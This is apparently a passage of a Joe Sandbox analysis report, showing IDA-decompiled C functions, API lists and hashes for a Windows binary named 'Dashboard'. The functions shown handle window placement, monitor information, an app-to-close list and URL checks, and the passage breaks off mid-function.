                                                                                                                    0x0100673a
                                                                                                                    0x0100673c
                                                                                                                    0x00000000
                                                                                                                    0x0100673e
                                                                                                                    0x0100673e
                                                                                                                    0x01006742
                                                                                                                    0x01006748
                                                                                                                    0x0100674e
                                                                                                                    0x01006751
                                                                                                                    0x01006755
                                                                                                                    0x0100675a
                                                                                                                    0x0100675d
                                                                                                                    0x01006761
                                                                                                                    0x01006768
                                                                                                                    0x0100676c
                                                                                                                    0x0100676c
                                                                                                                    0x0100673c
                                                                                                                    0x0100679e
                                                                                                                    0x010067a0
                                                                                                                    0x010067a3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010067a3
                                                                                                                    0x00000000
                                                                                                                    0x010067a5
                                                                                                                    0x010067a5
                                                                                                                    0x010067ab
                                                                                                                    0x010067ab
                                                                                                                    0x010066fd
                                                                                                                    0x010066f2
                                                                                                                    0x010067b4
                                                                                                                    0x010067b5
                                                                                                                    0x010067b5
                                                                                                                    0x0100668c
                                                                                                                    0x0100668c
                                                                                                                    0x0100668c
                                                                                                                    0x010067da
                                                                                                                    0x010067e5
                                                                                                                    0x010067f2

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0100665D
                                                                                                                    • CommandLineToArgvW.SHELL32(?,?,00000014,01006813,00000000), ref: 0100669F
                                                                                                                    • LocalFree.KERNEL32(00000000,?,?), ref: 010067B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArgvCommandFreeH_prolog3LineLocal
                                                                                                                    • String ID: W
                                                                                                                    • API String ID: 646583325-655174618
                                                                                                                    • Opcode ID: c6e531c2e11936415607fb09a72066b7f559ed272eace614d8533ada9af4e8f0
                                                                                                                    • Instruction ID: c2037d6ca735e8c2fcf5abfbf6f588a1479a6db5a6e75aec73436c4836c6c77c
                                                                                                                    • Opcode Fuzzy Hash: c6e531c2e11936415607fb09a72066b7f559ed272eace614d8533ada9af4e8f0
                                                                                                                    • Instruction Fuzzy Hash: DF41447090020BABEF06EFA4CC94AFE7BB6BF14350F144429F596A72C4DB359A54CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 60%
                                                                                                                    			E0100ED5F(void* __ecx) {
                                                                                                                    				signed int _v8;
                                                                                                                    				struct HWND__* _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				char _v20;
                                                                                                                    				struct tagRECT _v36;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				struct _WINDOWPLACEMENT _v80;
                                                                                                                    				struct HWND__* _t52;
                                                                                                                    				signed int _t54;
                                                                                                                    				intOrPtr _t56;
                                                                                                                    				int _t62;
                                                                                                                    				int _t66;
                                                                                                                    				signed int _t72;
                                                                                                                    				void* _t74;
                                                                                                                    
                                                                                                                    				_t74 = __ecx;
                                                                                                                    				_t52 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t52 != 0x101a004 && ( *(_t52 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t4 = _t52 + 0x14; // 0x65637845
                                                                                                                    					_t5 = _t52 + 0x10; // 0x6c744143
                                                                                                                    					_t52 = E010049DE(_t52,  *_t5,  *_t4, 0x29, 0x1002308);
                                                                                                                    				}
                                                                                                                    				__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    				_v12 = _t52;
                                                                                                                    				if(_t52 != 0) {
                                                                                                                    					_t54 = E0100D50F(_t74, __eflags,  &_v36);
                                                                                                                    					__eflags = _t54;
                                                                                                                    					_v8 = _t54;
                                                                                                                    					if(_t54 < 0) {
                                                                                                                    						goto L17;
                                                                                                                    					}
                                                                                                                    					_t56 =  *0x101a004; // 0x101a004
                                                                                                                    					__eflags = _t56 - 0x101a004;
                                                                                                                    					if(_t56 != 0x101a004) {
                                                                                                                    						__eflags =  *(_t56 + 0x1c) & 0x00000008;
                                                                                                                    						if(( *(_t56 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    							__eflags = _v36.right - _v36.left;
                                                                                                                    							_t18 = _t56 + 0x14; // 0x65637845
                                                                                                                    							_t19 = _t56 + 0x10; // 0x6c744143
                                                                                                                    							E010090BD( *_t19,  *_t18, 0x2a, 0x1002308, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					 *((intOrPtr*)(_t74 + 0x4c)) = _v36.bottom - _v36.top;
                                                                                                                    					 *((intOrPtr*)(_t74 + 0x50)) = _v36.right - _v36.left;
                                                                                                                    					_t62 = GetWindowPlacement(_v12,  &_v80);
                                                                                                                    					__eflags = _t62;
                                                                                                                    					if(_t62 != 0) {
                                                                                                                    						L11:
                                                                                                                    						__eflags =  *((char*)(_t74 + 0x44));
                                                                                                                    						if( *((char*)(_t74 + 0x44)) != 0) {
                                                                                                                    							_push(_v48);
                                                                                                                    							_push(_v80.rcNormalPosition);
                                                                                                                    						} else {
                                                                                                                    							E010156A1( &_v20,  *((intOrPtr*)(_t74 + 0x4c)),  *((intOrPtr*)(_t74 + 0x50)), 0);
                                                                                                                    							_push(_v16);
                                                                                                                    							_push(_v20);
                                                                                                                    						}
                                                                                                                    						OffsetRect( &_v36, ??, ??);
                                                                                                                    						_v80.flags = _v80.flags & 0x00000000;
                                                                                                                    						_v80.length = 0x2c;
                                                                                                                    						_v80.showCmd = 4;
                                                                                                                    						asm("movsd");
                                                                                                                    						asm("movsd");
                                                                                                                    						asm("movsd");
                                                                                                                    						asm("movsd");
                                                                                                                    						_t66 = SetWindowPlacement(_v12,  &_v80);
                                                                                                                    						__eflags = _t66;
                                                                                                                    						if(_t66 == 0) {
                                                                                                                    							_v8 = E0100CC3F();
                                                                                                                    						}
                                                                                                                    						 *((intOrPtr*)(_t74 + 0x54)) = _v80.rcNormalPosition;
                                                                                                                    						 *((intOrPtr*)(_t74 + 0x58)) = _v48;
                                                                                                                    						goto L17;
                                                                                                                    					} else {
                                                                                                                    						_t72 = E0100CC3F();
                                                                                                                    						__eflags = _t72;
                                                                                                                    						_v8 = _t72;
                                                                                                                    						if(_t72 < 0) {
                                                                                                                    							goto L17;
                                                                                                                    						}
                                                                                                                    						goto L11;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_v8 = 0x8000ffff;
                                                                                                                    					L17:
                                                                                                                    					return _v8;
                                                                                                                    				}
                                                                                                                    			}

















                                                                                                                    0x0100ed6a
                                                                                                                    0x0100ed6c
                                                                                                                    0x0100ed7d
                                                                                                                    0x0100ed88
                                                                                                                    0x0100ed8b
                                                                                                                    0x0100ed8e
                                                                                                                    0x0100ed8e
                                                                                                                    0x0100ed96
                                                                                                                    0x0100ed9e
                                                                                                                    0x0100eda1
                                                                                                                    0x0100edb5
                                                                                                                    0x0100edba
                                                                                                                    0x0100edbc
                                                                                                                    0x0100edbf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100edc5
                                                                                                                    0x0100edca
                                                                                                                    0x0100edcc
                                                                                                                    0x0100edce
                                                                                                                    0x0100edd2
                                                                                                                    0x0100edde
                                                                                                                    0x0100ede5
                                                                                                                    0x0100ede8
                                                                                                                    0x0100edeb
                                                                                                                    0x0100edeb
                                                                                                                    0x0100edd2
                                                                                                                    0x0100edf6
                                                                                                                    0x0100edff
                                                                                                                    0x0100ee09
                                                                                                                    0x0100ee0f
                                                                                                                    0x0100ee11
                                                                                                                    0x0100ee1f
                                                                                                                    0x0100ee1f
                                                                                                                    0x0100ee23
                                                                                                                    0x0100ee3e
                                                                                                                    0x0100ee41
                                                                                                                    0x0100ee25
                                                                                                                    0x0100ee31
                                                                                                                    0x0100ee36
                                                                                                                    0x0100ee39
                                                                                                                    0x0100ee39
                                                                                                                    0x0100ee48
                                                                                                                    0x0100ee4e
                                                                                                                    0x0100ee52
                                                                                                                    0x0100ee59
                                                                                                                    0x0100ee66
                                                                                                                    0x0100ee67
                                                                                                                    0x0100ee6b
                                                                                                                    0x0100ee70
                                                                                                                    0x0100ee71
                                                                                                                    0x0100ee77
                                                                                                                    0x0100ee79
                                                                                                                    0x0100ee80
                                                                                                                    0x0100ee80
                                                                                                                    0x0100ee86
                                                                                                                    0x0100ee8c
                                                                                                                    0x00000000
                                                                                                                    0x0100ee13
                                                                                                                    0x0100ee13
                                                                                                                    0x0100ee18
                                                                                                                    0x0100ee1a
                                                                                                                    0x0100ee1d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100ee1d
                                                                                                                    0x0100eda3
                                                                                                                    0x0100eda3
                                                                                                                    0x0100ee8f
                                                                                                                    0x0100ee96
                                                                                                                    0x0100ee96

                                                                                                                    APIs
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE ref: 0100ED96
                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0100EE09
                                                                                                                    • OffsetRect.USER32(?,?,?), ref: 0100EE48
                                                                                                                    • SetWindowPlacement.USER32(?,0000002C), ref: 0100EE71
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PlacementWindow$D__@@DirectHost@MessageNativeOffsetRectTrace
                                                                                                                    • String ID: ,
                                                                                                                    • API String ID: 2422741864-3772416878
                                                                                                                    • Opcode ID: d3990d08e9713a60291aa3fb01dcc106f6649d26d8794f03157c310cebab1159
                                                                                                                    • Instruction ID: 151ea1f11fd12e3433d2786e5b73943f56fb14e63ea05fbf54b584d2d45c1a03
                                                                                                                    • Opcode Fuzzy Hash: d3990d08e9713a60291aa3fb01dcc106f6649d26d8794f03157c310cebab1159
                                                                                                                    • Instruction Fuzzy Hash: C1411671A00249AFEF56DFA8C984AAEBFB5FF08300F0044A9EA44F7295D735D904CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E0100D2C8(intOrPtr __ecx, void* __eflags, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				void* _t23;
                                                                                                                    				intOrPtr _t29;
                                                                                                                    				intOrPtr _t30;
                                                                                                                    				void* _t34;
                                                                                                                    				intOrPtr _t35;
                                                                                                                    				intOrPtr* _t36;
                                                                                                                    				intOrPtr _t37;
                                                                                                                    				signed int _t39;
                                                                                                                    				intOrPtr _t41;
                                                                                                                    				signed int _t42;
                                                                                                                    				void* _t49;
                                                                                                                    				intOrPtr _t50;
                                                                                                                    				void* _t52;
                                                                                                                    
                                                                                                                    				_t39 = 0;
                                                                                                                    				_v12 = __ecx;
                                                                                                                    				_t52 = 0;
                                                                                                                    				_v8 = 0;
                                                                                                                    				__imp__?StrToID@DirectUI@@YGGPB_W@Z(E0100CE8D(_t23, __ecx));
                                                                                                                    				_t41 = E0100C2F9(_t24, _t24, L"idAppToCloseList");
                                                                                                                    				_v16 = _t41;
                                                                                                                    				if(_t41 != 0) {
                                                                                                                    					__imp__?DestroyAll@Element@DirectUI@@QAEJXZ(_t49);
                                                                                                                    					_t50 = _a12;
                                                                                                                    					if( *((intOrPtr*)(_t50 + 4)) > 0) {
                                                                                                                    						while(1) {
                                                                                                                    							_t29 = _v12;
                                                                                                                    							if( *((intOrPtr*)(_t29 + 0x2c)) == 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							_t30 =  *((intOrPtr*)(_t29 + 0x2c));
                                                                                                                    							_t10 = _t30 + 0xc; // 0xc
                                                                                                                    							_t52 =  *((intOrPtr*)( *_t10))(L"FileInUseProcess",  &_v8, 0);
                                                                                                                    							if(_t52 >= 0) {
                                                                                                                    								_t34 = E0100C887(E0100C2D4(_t50, _t39), _v8,  *_t33);
                                                                                                                    								_t52 = _t34;
                                                                                                                    								if(_t52 >= 0) {
                                                                                                                    									__imp__?Add@Element@DirectUI@@QAEJPAV12@@Z(_v8);
                                                                                                                    									_t52 = _t34;
                                                                                                                    									if(_t52 >= 0) {
                                                                                                                    										_v8 = _v8 & 0x00000000;
                                                                                                                    										_t35 =  *0x101a004; // 0x101a004
                                                                                                                    										if(_t35 != 0x101a004 && ( *(_t35 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    											_t36 = E0100C2D4(_t50, _t39);
                                                                                                                    											_t37 =  *0x101a004; // 0x101a004
                                                                                                                    											_t19 = _t37 + 0x14; // 0x65637845
                                                                                                                    											_t20 = _t37 + 0x10; // 0x6c744143
                                                                                                                    											E01006C01( *_t20,  *_t19, 0xa, 0x1002308,  *_t36);
                                                                                                                    										}
                                                                                                                    										_t39 = _t39 + 1;
                                                                                                                    										if(_t39 <  *((intOrPtr*)(_t50 + 4))) {
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						_t52 = 0x8000ffff;
                                                                                                                    					}
                                                                                                                    					L13:
                                                                                                                    				} else {
                                                                                                                    					_t52 = 0x8000ffff;
                                                                                                                    				}
                                                                                                                    				_t42 = _v8;
                                                                                                                    				if(_t42 != 0) {
                                                                                                                    					 *((intOrPtr*)( *_t42))(1);
                                                                                                                    				}
                                                                                                                    				return _t52;
                                                                                                                    			}



















                                                                                                                    0x0100d2d2
                                                                                                                    0x0100d2d4
                                                                                                                    0x0100d2d7
                                                                                                                    0x0100d2d9
                                                                                                                    0x0100d2e7
                                                                                                                    0x0100d2f3
                                                                                                                    0x0100d2f7
                                                                                                                    0x0100d2fa
                                                                                                                    0x0100d307
                                                                                                                    0x0100d30d
                                                                                                                    0x0100d313
                                                                                                                    0x0100d319
                                                                                                                    0x0100d319
                                                                                                                    0x0100d320
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d326
                                                                                                                    0x0100d32e
                                                                                                                    0x0100d33b
                                                                                                                    0x0100d33f
                                                                                                                    0x0100d34e
                                                                                                                    0x0100d353
                                                                                                                    0x0100d357
                                                                                                                    0x0100d35f
                                                                                                                    0x0100d365
                                                                                                                    0x0100d369
                                                                                                                    0x0100d36b
                                                                                                                    0x0100d36f
                                                                                                                    0x0100d379
                                                                                                                    0x0100d384
                                                                                                                    0x0100d38b
                                                                                                                    0x0100d397
                                                                                                                    0x0100d39a
                                                                                                                    0x0100d39d
                                                                                                                    0x0100d39d
                                                                                                                    0x0100d3a2
                                                                                                                    0x0100d3a6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d3ac
                                                                                                                    0x0100d3a6
                                                                                                                    0x0100d369
                                                                                                                    0x0100d357
                                                                                                                    0x00000000
                                                                                                                    0x0100d33f
                                                                                                                    0x0100d3ae
                                                                                                                    0x0100d3ae
                                                                                                                    0x0100d3b3
                                                                                                                    0x0100d2fc
                                                                                                                    0x0100d2fc
                                                                                                                    0x0100d2fc
                                                                                                                    0x0100d3b4
                                                                                                                    0x0100d3b9
                                                                                                                    0x0100d3bf
                                                                                                                    0x0100d3bf
                                                                                                                    0x0100d3c6

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0100CE8D: ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE(0100D2E1), ref: 0100CE90
                                                                                                                      • Part of subcall function 0100CE8D: ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(00000000), ref: 0100CEA1
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idAppToCloseList,00000000), ref: 0100D2E7
                                                                                                                      • Part of subcall function 0100C2F9: ?FindDescendent@Element@DirectUI@@QAEPAV12@G@Z.UXCORE(00000000,?,00000000,?,01012820,00000000,?,01012C67,00000000,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001), ref: 0100C30C
                                                                                                                    • ?DestroyAll@Element@DirectUI@@QAEJXZ.UXCORE(?,00000000), ref: 0100D307
                                                                                                                    • ?Add@Element@DirectUI@@QAEJPAV12@@Z.UXCORE(?,00000000), ref: 0100D35F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$Element@$Add@All@Descendent@DestroyElement@2@FindHost@NativeV12@V12@@
                                                                                                                    • String ID: FileInUseProcess$idAppToCloseList
                                                                                                                    • API String ID: 3525022571-2046938704
                                                                                                                    • Opcode ID: e9966d58a17102918ce4b63c731e4e87e7c69f47d073d851fb94f02b8b8963e1
                                                                                                                    • Instruction ID: 7ac993181683e2e9e9251bc9cd7b45801f5b3eed484b9137fd60986efe64c7a8
                                                                                                                    • Opcode Fuzzy Hash: e9966d58a17102918ce4b63c731e4e87e7c69f47d073d851fb94f02b8b8963e1
                                                                                                                    • Instruction Fuzzy Hash: 0B31E835A00215EFE7179FE8C584E6DB7B5BF44314F0181A9FA81A72D1C7359D00DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 27%
                                                                                                                    			E010155ED(intOrPtr _a4, void* _a8, void* _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				struct tagMONITORINFO _v112;
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				signed int _t11;
                                                                                                                    				void* _t18;
                                                                                                                    				intOrPtr _t21;
                                                                                                                    				void* _t22;
                                                                                                                    				struct HMONITOR__* _t24;
                                                                                                                    				signed int _t25;
                                                                                                                    
                                                                                                                    				_t11 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t11 ^ _t25;
                                                                                                                    				_t18 = _a12;
                                                                                                                    				_t22 = _a8;
                                                                                                                    				_t13 = SystemParametersInfoW(0x30, 0, _t22, 0);
                                                                                                                    				__imp__MonitorFromRect(_a4, 2);
                                                                                                                    				_t24 = _t13;
                                                                                                                    				if(_t24 != 0) {
                                                                                                                    					memset( &_v112, 0, 0x68);
                                                                                                                    					_v112.cbSize = 0x28;
                                                                                                                    					if(GetMonitorInfoW(_t24,  &_v112) != 0) {
                                                                                                                    						if(_t22 != 0) {
                                                                                                                    							_t24 =  &(_v112.rcWork);
                                                                                                                    							asm("movsd");
                                                                                                                    							asm("movsd");
                                                                                                                    							asm("movsd");
                                                                                                                    							asm("movsd");
                                                                                                                    						}
                                                                                                                    						if(_t18 != 0) {
                                                                                                                    							_t24 =  &(_v112.rcMonitor);
                                                                                                                    							_t22 = _t18;
                                                                                                                    							asm("movsd");
                                                                                                                    							asm("movsd");
                                                                                                                    							asm("movsd");
                                                                                                                    							asm("movsd");
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E010087FB(_t13, _t18, _v8 ^ _t25, _t21, _t22, _t24);
                                                                                                                    			}














                                                                                                                    0x010155f5
                                                                                                                    0x010155fc
                                                                                                                    0x01015600
                                                                                                                    0x01015608
                                                                                                                    0x01015612
                                                                                                                    0x0101561b
                                                                                                                    0x01015621
                                                                                                                    0x01015625
                                                                                                                    0x0101562f
                                                                                                                    0x0101563c
                                                                                                                    0x0101564b
                                                                                                                    0x0101564f
                                                                                                                    0x01015651
                                                                                                                    0x01015654
                                                                                                                    0x01015655
                                                                                                                    0x01015656
                                                                                                                    0x01015657
                                                                                                                    0x01015657
                                                                                                                    0x0101565a
                                                                                                                    0x0101565c
                                                                                                                    0x0101565f
                                                                                                                    0x01015661
                                                                                                                    0x01015662
                                                                                                                    0x01015663
                                                                                                                    0x01015664
                                                                                                                    0x01015664
                                                                                                                    0x0101565a
                                                                                                                    0x0101564b
                                                                                                                    0x01015673

                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 01015612
                                                                                                                    • MonitorFromRect.USER32(?,00000002), ref: 0101561B
                                                                                                                    • memset.MSVCR80 ref: 0101562F
                                                                                                                    • GetMonitorInfoW.USER32 ref: 01015643
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoMonitor$FromParametersRectSystemmemset
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 3123987128-3887548279
                                                                                                                    • Opcode ID: d741c6c5a155b698c32bf338a5ede82430338b792feffbcae73892928b839b31
                                                                                                                    • Instruction ID: e2bdba4887ad33cabea078026ad4d5b052aeca5d00e6cca63a21410aeef5ad0a
                                                                                                                    • Opcode Fuzzy Hash: d741c6c5a155b698c32bf338a5ede82430338b792feffbcae73892928b839b31
                                                                                                                    • Instruction Fuzzy Hash: 1311C872A01704A7E721DF999C45F9F77BDAF8A710F444015BE40AF184D7B6E9048790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E01010838(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t19;
                                                                                                                    				void* _t28;
                                                                                                                    				void* _t45;
                                                                                                                    				intOrPtr* _t47;
                                                                                                                    				void* _t49;
                                                                                                                    				void* _t50;
                                                                                                                    
                                                                                                                    				_t50 = __eflags;
                                                                                                                    				_t42 = __edx;
                                                                                                                    				_t29 = __ebx;
                                                                                                                    				_push(4);
                                                                                                                    				E0100880F(E010161E4, __ebx, __edi, __esi);
                                                                                                                    				_t45 = 1;
                                                                                                                    				E01004D33(_t49 - 0x10, 0x101a5f0);
                                                                                                                    				_t47 =  *((intOrPtr*)(_t49 + 8));
                                                                                                                    				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
                                                                                                                    				_push(_t47);
                                                                                                                    				_push(_t49 + 8);
                                                                                                                    				_t19 = E0101054D(__ebx, __edx, 1, _t47, _t50);
                                                                                                                    				 *(_t49 - 4) = 1;
                                                                                                                    				E010061C3(__ebx, _t49 - 0x10, _t19);
                                                                                                                    				 *(_t49 - 4) = 0;
                                                                                                                    				E01004925( *((intOrPtr*)(_t49 + 8)) + 0xfffffff0, _t42);
                                                                                                                    				E010061C3(_t29, _t49 - 0x10, E0100FC59(_t49 - 0x10));
                                                                                                                    				if(E01004CF1(_t49 - 0x10, L"msn", 0) != 0xffffffff) {
                                                                                                                    					L3:
                                                                                                                    					_t45 = 0;
                                                                                                                    				} else {
                                                                                                                    					_t28 = E01004CF1(_t49 - 0x10, L"live.com", 0);
                                                                                                                    					if(_t28 != 0xffffffff) {
                                                                                                                    						goto L3;
                                                                                                                    					} else {
                                                                                                                    						__imp___wcsicmp( *_t47, L"http://go.microsoft.com/fwlink/?linkid=677");
                                                                                                                    						if(_t28 == 0) {
                                                                                                                    							goto L3;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				E01004925( *((intOrPtr*)(_t49 - 0x10)) + 0xfffffff0, _t42);
                                                                                                                    				return E010088FB(_t45);
                                                                                                                    			}









                                                                                                                    0x01010838
                                                                                                                    0x01010838
                                                                                                                    0x01010838
                                                                                                                    0x01010838
                                                                                                                    0x0101083f
                                                                                                                    0x0101084e
                                                                                                                    0x0101084f
                                                                                                                    0x01010854
                                                                                                                    0x01010857
                                                                                                                    0x0101085b
                                                                                                                    0x0101085f
                                                                                                                    0x01010860
                                                                                                                    0x01010869
                                                                                                                    0x0101086d
                                                                                                                    0x01010878
                                                                                                                    0x0101087c
                                                                                                                    0x0101088d
                                                                                                                    0x010108a4
                                                                                                                    0x010108ce
                                                                                                                    0x010108ce
                                                                                                                    0x010108a6
                                                                                                                    0x010108b0
                                                                                                                    0x010108b8
                                                                                                                    0x00000000
                                                                                                                    0x010108ba
                                                                                                                    0x010108c2
                                                                                                                    0x010108cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010108cc
                                                                                                                    0x010108b8
                                                                                                                    0x010108d6
                                                                                                                    0x010108e2

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0101083F
                                                                                                                      • Part of subcall function 0101054D: __EH_prolog3.LIBCMT ref: 01010554
                                                                                                                      • Part of subcall function 01004CF1: wcsstr.MSVCR80 ref: 01004D14
                                                                                                                    • _wcsicmp.MSVCR80 ref: 010108C2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3$_wcsicmpwcsstr
                                                                                                                    • String ID: http://go.microsoft.com/fwlink/?linkid=677$live.com$msn
                                                                                                                    • API String ID: 833426062-580272
                                                                                                                    • Opcode ID: c04370721e553d7787d839864517dacf586274b057958e95ec4922c90dabcd1f
                                                                                                                    • Instruction ID: 54811ff9200b1456d5c1b90e5079fdb4b0822ae782a457391fb1bf4a4d5d780a
                                                                                                                    • Opcode Fuzzy Hash: c04370721e553d7787d839864517dacf586274b057958e95ec4922c90dabcd1f
                                                                                                                    • Instruction Fuzzy Hash: 8011A03190010AAAEB16EBB5CD40FEE7364AF21330F144619FAE1A71C5DF7466848665
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E01009783(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr* _t64;
                                                                                                                    				intOrPtr* _t66;
                                                                                                                    				intOrPtr* _t68;
                                                                                                                    				intOrPtr* _t72;
                                                                                                                    				intOrPtr* _t74;
                                                                                                                    				intOrPtr* _t78;
                                                                                                                    				intOrPtr _t80;
                                                                                                                    				intOrPtr* _t81;
                                                                                                                    				intOrPtr* _t84;
                                                                                                                    				intOrPtr* _t88;
                                                                                                                    				intOrPtr* _t90;
                                                                                                                    				void* _t112;
                                                                                                                    				intOrPtr* _t114;
                                                                                                                    				void* _t115;
                                                                                                                    				void* _t116;
                                                                                                                    
                                                                                                                    				_t116 = __eflags;
                                                                                                                    				_push(0x1c);
                                                                                                                    				E0100880F(E01015D08, __ebx, __edi, __esi);
                                                                                                                    				 *((intOrPtr*)(_t115 - 0x24)) = 0;
                                                                                                                    				_push(_t115 - 0x24);
                                                                                                                    				 *(_t115 - 4) = 0;
                                                                                                                    				if(E010096D9(0, __ecx, __edi, __esi, _t116) < 0) {
                                                                                                                    					L22:
                                                                                                                    					_t64 =  *((intOrPtr*)(_t115 - 0x24));
                                                                                                                    					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                                                                                                    					if(_t64 != 0) {
                                                                                                                    						_t64 =  *((intOrPtr*)( *_t64 + 8))(_t64);
                                                                                                                    					}
